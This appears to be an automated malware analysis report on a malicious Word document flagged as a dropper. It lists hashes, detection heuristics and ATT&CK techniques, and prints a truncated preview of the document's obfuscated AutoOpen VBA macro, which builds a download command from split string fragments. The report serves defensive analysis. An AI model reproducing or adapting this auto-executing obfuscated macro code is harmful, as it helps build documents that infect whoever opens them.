Office (OLE) malware analysis — malicious · 32a160f4c672ee9a

MALICIOUS

Office (OLE)

494.5 KB Created: 2018-10-08 13:03:00 Authoring application: Microsoft Office Word First seen: 2018-11-05

MD5: 800badd867445bd5399c370473de259c SHA-1: 91a0c442955bb77676fed3b5fd520efa2500a1be SHA-256: 32a160f4c672ee9aaaf2e65c154114db785d9dc2baba62219e424fad49f39160

370 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

This Office document contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro utilizes a reassembled string 'scripting.filesystemobject' and a Shell() call, indicating an intent to interact with the file system and execute commands. This strongly suggests the document is a dropper designed to download and execute a second-stage payload.

Heuristics 11

ClamAV: Doc.Dropper.Agent-7154332-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7154332-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 279867 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	279867 bytes
SHA-256: `07c72cf2a60aa4b72e009aa661c5f0effac49bd0567fb65a7e45cb30b784cfce`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Function wefwef() wefiwef = wefwihefj wiguowef = "fweweIUF" End Function Public Function eeewewewie() MsgBox "lol" End Function Sub AutoOpen() Const auutgd = False Const pue_uofn = False Const zjkcey = False Const ue_pmeo = False Const oeiui = True Const agdiunv = False Const tdwcorm = False Const iuuhw = False Const ygvcbqpxc = True Select Case 42 - 70 Case -28 iuoh = "$yyyywiayoraaeuufio_pkdtuicxco" Case bexsagnj_ik Const txtvny = True Const owmtojk = False Const yops_qsoa = False End Select Select Case 13 - 78 Case -65 bay_eyfokh = iuoh Const oe_yobj = False bay_eyfokh = bay_eyfokh + "_hve='m 465;if';$oaj" Case 13069 Const bjiofke0 = True End Select Const qkyc_i_ku = True Select Case "vweea2" Case "vweea2" biukeitwht = yqsfva + bay_eyfokh + ghhioyoi kloe = "xnpelow_" Const owctmbw = True Const e_jhyaia = True biukeitwht = biukeitwht + kloe + iioaa_ogu End Select Const ti_uybi54 = False If 54 * 86 = 9819 Then Const ud_uoe = True Const spyukno = True Const yzdrktymx = True Const xpksi = True ElseIf 5207 >= 1483 Then ogwafmdt = biukeitwht Const mbibrdji = True Const mlqlmcaxt2 = False Const fjvppo = False o_zkaa = "eiixidfokcgjsk" ogwafmdt = ogwafmdt + o_zkaa Else Const ik_euojl = False Const kkdgxfat_cb = True Const rfjmfe_o = True Const atxarh = False Const gwhpex = True End If Const rg_mi50 = True Select Case "ywmyppzgvte_a" Case "ywmyppzgvte_a" fajm_eabqe = "e_vqdkio" ogwafmdt = ogwafmdt + fajm_eabqe End Select Select Case "yuaiecwrvu" Case "yuaiecwrvu" ieqb = "ar_ir='//s'" Const qgualry = True ogwafmdt = ogwafmdt + ieqb End Select Select Case "bmghabpfx" Case iyywv Const azdibmy = True Const rpotxi = False Const ychxdxkpa = True Case "bmghabpfx" gbryem = ogwafmdt vjvzgcvgcg_ni = ";$pksueau_oi_aqyhci_uyg='ntz''" gbryem = yui_woe + gbryem + vjvzgcvgcg_ni End Select Const ffseht = True Select Case 38 + 86 Case 124 aeud = ")';$dpimoqli_xbyzku='while(1';$teupytxdss" gbryem = thmuufhh + gbryem + aeud + ueccghdtt Case tfleiust Const uyvlapv = False Const eybuau00 = True Const uupai = False End Select Select Case "uvzgsdkahrqq" Case "uvzgsdkahrqq" a_iid = xfeokcqoi + gbryem Const eydjht = True aiojtawd = "rfitzzpjzaujthv" Const ivavp = True a_iid = noybmuyq_a + a_iid + aiojtawd + czmtga End Select Select Case 52 - 15 Case 37 a_iid = a_iid + "hsh='ient).Do';$eulv_ehtxnhgiislpwusnunzrictb" Case i_ail Const uhayyy = True Const veogz = True Case 9583 Const oagd = True Const eu_ou = True End Select Select Case "yomkhdalt" Case "yomkhdalt" wgelh_mn = "zdswdwj_" a_iid = a_iid + wgelh_mn End Select Select Case "umvshuebcg" Case 30578 Const utjogu = False Const lxfczmi = True Const wofpacxm0 = False Case ufafkvl Const icrqqu = True Const sdkie = False Const ouxhy = True Case "umvshuebcg" oqmiriai = tf_ktaavsai + a_iid Const xhhhicdl = True ourslk = "yi21='UF';$uiswlvu_v" oqmiriai = oqmiriai + ourslk End Select Const gw_xdoa = False Select Case "r_opeqy" Case "r_opeqy" yzgfcezdtfii = oqmiriai + ranncvvubw Const zhnjcree = True ygjyoyg = "kixduqwlnavnayxue='h , ''f1''" yzgfcezdtfii = yzgfcezdtfii + ygjyoyg Case ghzusxn Const auryua = True Const oxhyou = True End Select Const wns_eaa = False Select Case 40 * 98 Case 23958 Const aiouaa = False Const uhapj = True Case 3920 ii_illw = yzgfcezdtfii Const fitqnoi = False Const ehadldte = True bcoimcn_ese = "';$y_oyuyjgiy" Const lbdii = False ii_illw = ddpc_rcmrc + ii_illw + bcoimcn_ese End Select Const lhmjji = True Select Case "ftheiyuua" Case "ftheiyuua" eadtgp_ea = "hcp='bjy" Const lojsmlc = True ii_illw = ii_illw + eadtgp_ea End Select Const twniu = False Const worgnin = True If 71 - 19 = 52 The ... (truncated)

SHA-256: 07c72cf2a60aa4b72e009aa661c5f0effac49bd0567fb65a7e45cb30b784cfce

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function wefwef()
wefiwef = wefwihefj
wiguowef = "fweweIUF"
End Function
Public Function eeewewewie()
MsgBox "lol"
End Function
Sub AutoOpen()
Const auutgd = False
Const pue_uofn = False
Const zjkcey = False
Const ue_pmeo = False
Const oeiui = True
Const agdiunv = False
Const tdwcorm = False
Const iuuhw = False
Const ygvcbqpxc = True

Select Case 42 - 70
Case -28
iuoh = "$yyyywiayoraaeuufio_pkdtuicxco"
Case bexsagnj_ik
Const txtvny = True
Const owmtojk = False
Const yops_qsoa = False
End Select
Select Case 13 - 78
Case -65
bay_eyfokh = iuoh
Const oe_yobj = False
bay_eyfokh = bay_eyfokh + "_hve='m 465;if';$oaj"
Case 13069
Const bjiofke0 = True
End Select
Const qkyc_i_ku = True

Select Case "vweea2"
Case "vweea2"
biukeitwht = yqsfva + bay_eyfokh + ghhioyoi
kloe = "xnpelow_"
Const owctmbw = True
Const e_jhyaia = True
biukeitwht = biukeitwht + kloe + iioaa_ogu
End Select
Const ti_uybi54 = False

If 54 * 86 = 9819 Then
Const ud_uoe = True
Const spyukno = True
Const yzdrktymx = True
Const xpksi = True
ElseIf 5207 >= 1483 Then
ogwafmdt = biukeitwht
Const mbibrdji = True
Const mlqlmcaxt2 = False
Const fjvppo = False
o_zkaa = "eiixidfokcgjsk"
ogwafmdt = ogwafmdt + o_zkaa
Else
Const ik_euojl = False
Const kkdgxfat_cb = True
Const rfjmfe_o = True
Const atxarh = False
Const gwhpex = True
End If
Const rg_mi50 = True

Select Case "ywmyppzgvte_a"
Case "ywmyppzgvte_a"
fajm_eabqe = "e_vqdkio"
ogwafmdt = ogwafmdt + fajm_eabqe
End Select
Select Case "yuaiecwrvu"
Case "yuaiecwrvu"
ieqb = "ar_ir='//s'"
Const qgualry = True
ogwafmdt = ogwafmdt + ieqb
End Select
Select Case "bmghabpfx"
Case iyywv
Const azdibmy = True
Const rpotxi = False
Const ychxdxkpa = True
Case "bmghabpfx"
gbryem = ogwafmdt
vjvzgcvgcg_ni = ";$pksueau_oi_aqyhci_uyg='ntz''"
gbryem = yui_woe + gbryem + vjvzgcvgcg_ni
End Select
Const ffseht = True

Select Case 38 + 86
Case 124
aeud = ")';$dpimoqli_xbyzku='while(1';$teupytxdss"
gbryem = thmuufhh + gbryem + aeud + ueccghdtt
Case tfleiust
Const uyvlapv = False
Const eybuau00 = True
Const uupai = False
End Select
Select Case "uvzgsdkahrqq"
Case "uvzgsdkahrqq"
a_iid = xfeokcqoi + gbryem
Const eydjht = True
aiojtawd = "rfitzzpjzaujthv"
Const ivavp = True
a_iid = noybmuyq_a + a_iid + aiojtawd + czmtga
End Select
Select Case 52 - 15
Case 37
a_iid = a_iid + "hsh='ient).Do';$eulv_ehtxnhgiislpwusnunzrictb"
Case i_ail
Const uhayyy = True
Const veogz = True
Case 9583
Const oagd = True
Const eu_ou = True
End Select
Select Case "yomkhdalt"
Case "yomkhdalt"
wgelh_mn = "zdswdwj_"
a_iid = a_iid + wgelh_mn
End Select
Select Case "umvshuebcg"
Case 30578
Const utjogu = False
Const lxfczmi = True
Const wofpacxm0 = False
Case ufafkvl
Const icrqqu = True
Const sdkie = False
Const ouxhy = True
Case "umvshuebcg"
oqmiriai = tf_ktaavsai + a_iid
Const xhhhicdl = True
ourslk = "yi21='UF';$uiswlvu_v"
oqmiriai = oqmiriai + ourslk
End Select
Const gw_xdoa = False

Select Case "r_opeqy"
Case "r_opeqy"
yzgfcezdtfii = oqmiriai + ranncvvubw
Const zhnjcree = True
ygjyoyg = "kixduqwlnavnayxue='h , ''f1''"
yzgfcezdtfii = yzgfcezdtfii + ygjyoyg
Case ghzusxn
Const auryua = True
Const oxhyou = True
End Select
Const wns_eaa = False

Select Case 40 * 98
Case 23958
Const aiouaa = False
Const uhapj = True
Case 3920
ii_illw = yzgfcezdtfii
Const fitqnoi = False
Const ehadldte = True
bcoimcn_ese = "';$y_oyuyjgiy"
Const lbdii = False
ii_illw = ddpc_rcmrc + ii_illw + bcoimcn_ese
End Select
Const lhmjji = True

Select Case "ftheiyuua"
Case "ftheiyuua"
eadtgp_ea = "hcp='bjy"
Const lojsmlc = True
ii_illw = ii_illw + eadtgp_ea
End Select
Const twniu = False
Const worgnin = True

If 71 - 19 = 52 The
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.